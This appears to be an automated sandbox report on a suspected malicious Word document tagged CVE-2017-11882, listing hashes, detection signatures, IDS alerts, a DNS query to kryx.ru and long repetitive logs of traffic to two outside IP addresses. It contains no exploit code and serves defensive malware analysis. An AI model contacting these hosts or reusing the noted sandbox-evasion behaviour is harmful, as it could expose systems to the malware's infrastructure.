Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
_________03M4138.docx.bin.doc

Overview

General Information

Sample name:_________03M4138.docx.bin.doc
Analysis ID:1638538
MD5:5651f8c9b317bc1b3f23d406590255c1
SHA1:f217e8fbb37c65867bbeecb2a6d6f0d556e91410
SHA256:c4ca2614797569a0427242f6db7e5cc00be0d0edb358629a9350e31b5a7f4e49
Tags:cve-2017-11882docdocxuser-TornadoAV_dev
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Contains an external reference to another file
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w11x64_office
  • WINWORD.EXE (PID: 7880 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.24, DestinationIsIpv6: false, DestinationPort: 53967, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7880, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-14T14:09:11.962199+010018100041Potentially Bad Traffic192.168.2.2453975188.225.72.170443TCP
2025-03-14T14:09:12.660437+010018100041Potentially Bad Traffic192.168.2.2453977213.165.70.9080TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-14T14:09:08.936799+010018100051Potentially Bad Traffic192.168.2.2453969188.225.72.170443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: _________03M4138.docx.bin.docVirustotal: Detection: 9%Perma Link
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.24:53967 version: TLS 1.2
Source: global trafficDNS query: name: kryx.ru
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53967 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53967
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53969
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53969 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53971 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53971
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53975 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53975
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
